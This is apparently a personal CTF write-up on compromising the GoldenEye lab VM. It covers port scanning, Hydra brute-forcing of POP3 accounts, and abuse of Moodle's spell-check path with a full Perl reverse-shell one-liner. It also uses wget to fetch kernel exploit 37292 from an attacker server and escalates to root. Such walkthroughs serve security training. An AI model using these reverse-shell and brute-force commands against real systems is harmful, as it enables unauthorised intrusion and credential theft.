Golden Eye

What up party people!

Lets get right to it,  this is the golden eye Ctf challenge  by creosote struggled through by yours truly. I actually really enjoyed this CTF, i learnt about pop3 cli commands, and moodle exploitation techniques, as well as basic linux privilege escalation. Read on to see how!

Starting with a netdiscover command to find out the ip, i then ran this nmap scan to enumerate more about the ports.

nmap -A -sT -sV -p-65535 -oN goldeneye.txt 192.168.128.15

alright, hopefully found some good stuff

PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=ubuntu
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open ssl/unknown
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
55007/tcp open unknown
Running: Linux 3.X|4.X

Lets go to that address and see whats running on the webserver…

some sort of login page… 

After browsing through the page source i found a couple of useful things in a file called “terminal.js” two user names and a potential password, Score.

//
//Boris, make sure you update your default password. 
//My sources say MI6 maybe planning to infiltrate. 
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//InvincibleHack3r
//
//BTW Natalya says she can break your codes
//

So username Natalya and Boris and what looks like an encoded password.

I did some research and discovered the characters were html encoded ascii characters so after finding a converter online i got the password

InvincibleHack3r

Ballin’ lets try those two user names with that password back over at /sev-home/

Success!

Lets check out ports 55006 and 55007 for the pop3 server

Boom, found the pop3 server on port 5007

telnet 192.168.128.15 55007
Trying 192.168.128.15...
Connected to 192.168.128.15.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System

first attempts to log in using the password InvincibleHack3r for each user was unsuccessful. Admin is requesting Boris update his default password so maybe we can brute force the pop3 server… lets hit it with hydra and see if we cant bust in. First i made a txt file called

hydra -L goldusers.txt -P /usr/share/wordlists/fasttrack.txt pop3://192.168.128.15:55007

Success!

[55007][pop3] host: 192.168.128.15 login: boris password: secret1!
[55007][pop3] host: 192.168.128.15 login: natalya password: bird

Once i logged into both accounts after learning how to view emails in a pop3 server at the helpful site sunnyoasis and read the emails i discovered another set of user credentials. Awesome.

username: xenia
password: RCP90rulez!

It also told user natalya to add the server ip to severnaya-station.com in /etc/hosts. After looking for that file and adding the directory i was able to navigate to the internal domain severnaya-station.com/gnocertdir

127.0.0.1 localhost
127.0.1.1 kali
192.168.128.15 severnaya-station.com

Hey look at that, got myself a moodle login screen, and hopefully some creds to open it.

I noticed the user had a message, telling her to contact him through email, so i ran doaks name through a hydra brute force and found his login information. Excellent.

 

root@kali:~# hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.128.15:55007
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 21:55:03
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://192.168.128.15:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[STATUS] 64.00 tries/min, 128 tries in 00:02h, 94 to do in 00:02h, 16 active
[55007][pop3] host: 192.168.128.15 login: doak password: goat
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 21:57:33

 

root@kali:~# telnet 192.168.128.15 55007
Trying 192.168.128.15...
Connected to 192.168.128.15.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
user doak
+OK
pass goat
+OK Logged in.
list
+OK 1 messages:
1 606
.
retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 97DC24549D
for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!

Excellenter, found another set of creds i can try.

After browsing through Dr_Doaks moodle account i found a secret.txt file with this very helpful link in it…

007,

I was able to capture this apps adm1n cr3ds through clear txt.

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

I navigated to that url and found an image, ill download this and check it out.

I was taught a quick way to check an image for hidden data was to run the strings command, so after checking for strings longer than 10 characters i found what looks like an piece of encoded information…

root@kali:~# strings -10 Downloads/for-007.jpg 
eFdpbnRlcjE5OTV4IQ==
""""""""""
! !!! !!!!!!!!"""""""""""""""
{k{]=QEiBA

i looked up how to convert base64 strings in command line and found this helpful command, which looks like it decoded the password…

root@kali:~# echo eFdpbnRlcjE5OTV4IQ== | base64 --decode
xWinter1995x!

Excellent, so i have what looks like the password for the adm1n creds, thanks Dr_Doaks. in the s3cret.txt file he mentioned he had captured the adm1n creds, so lets try adm1n with this password. No luck. Lets try just normal admin.. giddy up.

Lets poke around and see what we can find. Lets check if msfconsole has an exploit for command injection and make things easy for ourselves. Success!

msf > search moodle

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/multi/http/moodle_cmd_exec 2013-10-30 good Moodle Remote Command Execution


msf > use exploit/multi/http/moodle_cmd_exec 
msf exploit(multi/http/moodle_cmd_exec) >

ok so after putting in the credentials it completes the exploit but doesnt give an easy shell, bummer. Lets go deeper and see.

msf exploit(multi/http/moodle_cmd_exec) > exploit

[*] Started reverse TCP double handler on 192.168.128.10:4444 
[*] Authenticating as user: admin
[-] Exploit aborted due to failure: no-access: Login failed
[*] Exploit completed, but no session was created.

The system paths area of the server tab in the site administration section looks like it will let us execute commands, after looking up the path to aspell i think i can replaced the existing code with my own one line python reverse shell i got from my favorite cheat sheet for shells here (shout out to pentest monkey) and have it run.

the full code is

perl -e 'use Socket;$i="192.168.128.15";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

when i was reading up it mentioned the tinyMCE HTML editor needing to be set to PSpellShell so lets also make sure thats set.

Finally lets make sure we have set a listener to catch the shell.

root@kali:~# nc -nlvp 1234
listening on [any] 1234 ...

Ok so im going to make a post and hopefully when i spell check it i get a shell.

Got it

root@kali:~# nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.128.10] from (UNKNOWN) [192.168.128.15] 40648
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

Lets find out what type of Linux were running here. After brief reconnaissance we can see its ubuntu 3.13.0-32

$ uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

after searching for some vulnerabilities online i came across exploit 37292 so lets download that and put it on our target with a python simpleHTTPserver.

root@kali:~# python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.128.15 - - [28/Nov/2018 08:57:25] "GET /37292.c HTTP/1.1" 200 -
$ cd /var/tmp 
$ wget http://192.168.128.10:8000/37292.c
--2018-11-28 05:57:16-- http://192.168.128.10:8000/37292.c
Connecting to 192.168.128.10:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
Saving to: '37292.c'
0K .... 100% 5.12M=0.001s

2018-11-28 05:57:16 (5.12 MB/s) - '37292.c' saved [5119/5119]

Using gedit on the exploit shows it using gcc to compile, however this fails when attempted on the host machine, so i used cc, sadly this also failed.

$ gcc 37292.c 
/bin/sh: 11: gcc: not found
$ cc 37292.c -o pwn
37292.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]
}
37292.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
if(unshare(CLONE_NEWUSER) != 0)

37292.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);

37292.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
waitpid(pid, &status, 0);

37292.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
wait(NULL);

5 warnings generated.

looks like the code is still referencing gcc so ill change that and try again. I renamed the exploit expl.c.

$ cc expl.c -o ownage
$ ./ownage
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
# whoami
root

After navigating to the /root directory and looking at all files i found another flag.

# cd /root
# ls -lah
total 44K
drwx------ 3 root root 4.0K Apr 29 2018 .
drwxr-xr-x 22 root root 4.0K Apr 24 2018 ..
-rw-r--r-- 1 root root 19 May 3 2018 .bash_history
-rw-r--r-- 1 root root 3.1K Feb 19 2014 .bashrc
drwx------ 2 root root 4.0K Apr 28 2018 .cache
-rw------- 1 root root 144 Apr 29 2018 .flag.txt
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw------- 1 root root 1.0K Apr 23 2018 .rnd
-rw------- 1 root root 8.2K Apr 29 2018 .viminfo

# cat .flag.txt
Alec told me to place the codes here:

568628e0d993b1973adc718237da6e93

If you captured this make sure to go here.....
/006-final/xvf7-flag/

Lets go there and see what the fuss is about. 

Excellent! Another job well done.